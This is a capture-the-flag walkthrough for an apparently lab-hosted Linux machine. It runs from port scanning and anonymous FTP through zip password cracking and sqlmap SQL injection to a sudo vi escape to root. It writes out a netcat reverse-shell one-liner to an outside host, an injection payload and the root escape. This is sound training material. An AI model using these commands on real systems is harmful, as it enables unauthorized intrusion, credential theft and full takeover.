#Linux #FTP #SQL #SUID
NMAP Scan
nmap -sV -sC -p- 10.129.17.227
- To see the versions of the services running (-sV)
- To perform a script scan using the default set of scripts (-sC)
- To scan all ports from 1 through 65535 (-p-)
Open Ports
- 21/tcp open ftp vsftpd 3.0.3
- 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
FTP
Nmap scan highlights that anonymous FTP login is allowed
We are able to download the backup.zip
We have a situation here, what is the password of the zip file?
No worries, John the Ripper to rescue!
https://github.com/openwall/john
John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs
Here are the steps:
- Generate the hash of the zipfile and save it as hash
zip2john backup.zip > hash
- Use John to crack the password using commonly used words (rock.txt). If the password does not show up on the terminal, you can see the password in jonh.pot
john -w=/usr/share/wordlists/rockyou.txt hash
Thanks John! We can now unzip the backup.zip
- index.php --> there is a username:password pair with MD5 hash: You can use one of the free services for Decrypt & Encrypt MD5
- style.css
Using the credentials we can log in to the Car Catalogue
SQL Injection
- If you try a single quote (') inside the search box --> ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^
- If you try ' OR '1' = '1 --> No ERROR message: brings all cars as 1=1 always!
Let's use the sqlmap for this lab.
https://github.com/sqlmapproject/sqlmap.git
Automatic SQL injection and database takeover tool
Here are the steps:
- Capture the GET file of a sample search with BurpSuite as new.req
- Run the sqlmap tool
sqlmap -r new.req
- -r means REQUESTFILE: Load HTTP request from a file
- Run the --os-shell command
sqlmap -r new.req --os-shell
- --os-shell means prompt for an interactive operating system shell
- If asked "Do you want to retrieve the command standard output? [Y/n/a]" --> Click a = ALWAYS
- Do not forget to active the listener
- Get the reverse shell payload, revshells.com can help us here, we can try mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.26 87 >/tmp/f
- We can improve the shell and make it fully interactive using the following commands
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
It worked!
We can now capture the user flag!
Privilege Escalation
We are trying privilege escalation By using SUID. Let's start with this command:
find / -perm -4000 -type f 2>/dev/null
- / denotes that we will start from the top (root) of the file system and find every directory
- -perm denotes that we will search for the permissions that follow:
- -type states the type of file we are looking for
- f denotes a regular file, excluding directories and special files
- 2>/dev/null means we will redirect all errors to /dev/null. In other words, we will ignore all errors.
My shell dies after around 15 secs. I need to find a way (if there is any) to make it more stable.
SSH Login
ssh postgres@{IP}
sudo -l
#This command shows what priviliges we have
We can run binaries but we need to use GTFObins (https://gtfobins.github.io/) to bypass restrictions to run binaries
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
#(click) : (type) shell=/bin/sh (click enter)
#(click) : (type) shell
whoami
# should be root